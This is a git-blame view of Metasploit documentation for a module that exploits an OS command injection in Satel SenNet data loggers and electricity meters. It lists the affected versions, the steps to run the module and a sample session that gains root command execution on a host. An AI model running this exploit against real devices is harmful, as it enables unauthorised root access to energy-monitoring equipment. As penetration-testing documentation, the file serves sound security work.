adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

29 lines
1017 B
Markdown
Raw Normal View History

Updated module and doc
2017-05-24 06:33:08 +05:30
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
3. SenNet Multitask Meter V5.21a-1.18b and prior.
Add Satel SenNet Command Exec Module
2017-04-07 02:22:11 +05:30
## Verification Steps
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
sample output to scenarios
2020-01-16 11:15:06 -05:00
## Scenarios
Add Satel SenNet Command Exec Module
2017-04-07 02:22:11 +05:30
```
msf > use auxiliary/scanner/telnet/satel_cmd_exec
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(satel_cmd_exec) > run
[*] 1.3.3.7:5000 - Sending command now - id;
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
Updated module and doc
2017-05-24 06:33:08 +05:30
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
Add Satel SenNet Command Exec Module
2017-04-07 02:22:11 +05:30
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Reference in New Issue Copy Permalink